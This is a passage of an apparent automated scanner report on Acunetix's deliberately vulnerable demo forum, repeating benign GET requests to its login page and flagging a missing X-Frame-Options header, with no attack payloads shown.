<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 